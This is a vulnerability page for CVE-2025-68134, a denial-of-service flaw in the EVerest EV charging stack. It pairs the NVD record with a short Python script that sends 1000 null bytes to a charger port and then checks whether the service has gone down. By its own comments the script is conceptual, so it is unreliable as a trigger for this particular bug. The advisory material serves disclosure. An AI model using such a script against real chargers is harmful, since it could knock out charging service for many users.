CVE-2025-68134

# CVE-2025-68134 PoC - EVerest assert-induced DoS # This PoC demonstrates triggering the assert failure in EVerest # Note: Requires network access to the target EV charging system import socket import struct import time def send_malformed_request(target_ip, target_port): """ Send malformed data to trigger assert failure in EVerest module. This is a conceptual PoC - actual exploitation depends on specific module interface and assert conditions. """ try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, target_port)) # Craft malformed request to trigger assert condition # The specific payload depends on the vulnerable module # Common targets: invalid session tokens, out-of-range values, # malformed protocol messages exploit_payload = b'\x00' * 1000 # Example: oversized input sock.send(exploit_payload) response = sock.recv(1024) sock.close() return True except Exception as e: print(f"Error: {e}") return False def verify_dos(target_ip, target_port): """ Check if the EVerest system is still responding after exploit. """ try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) sock.connect((target_ip, target_port)) sock.close() return True # System still responding except: return False # System down - DoS successful # Usage example # target = "192.168.1.100" # port = 8849 # Example EVerest module port # send_malformed_request(target, port) # time.sleep(2) # if not verify_dos(target, port): # print("DoS confirmed - system unresponsive")

{"cve": {"id": "CVE-2025-68134", "sourceIdentifier": "[email protected]", "published": "2026-01-21T19:16:04.510", "lastModified": "2026-02-06T21:21:42.600", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "EVerest is an EV charging software stack. Prior to version 2025.10.0, the use of the `assert` function to handle errors frequently causes the module to crash. This is particularly critical because the manager shuts down all other modules and exits when any one of them terminates, leading to a denial of service. In a context where a manager handles multiple EVSE, this would also impact other users. Version 2025.10.0 fixes the issue."}, {"lang": "es", "value": "EVerest es una pila de software de carga de vehículos eléctricos. Antes de la versión 2025.10.0, el uso de la función `assert` para manejar errores frecuentemente causa que el módulo se bloquee. Esto es particularmente crítico porque el gestor apaga todos los demás módulos y sale cuando cualquiera de ellos termina, lo que lleva a una denegación de servicio. En un contexto donde un gestor maneja múltiples EVSE, esto también impactaría a otros usuarios. La versión 2025.10.0 soluciona el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linuxfoundation:everest:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.10.0", "matchCriteriaId": "94E1768A-FED9-477E-A4B7-99FD10058D23"}]}]}], "references": [{"url": "https://github.com/EVerest/everest-core/security/advisories/GHSA-cxc5-rrj5-8pf3", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}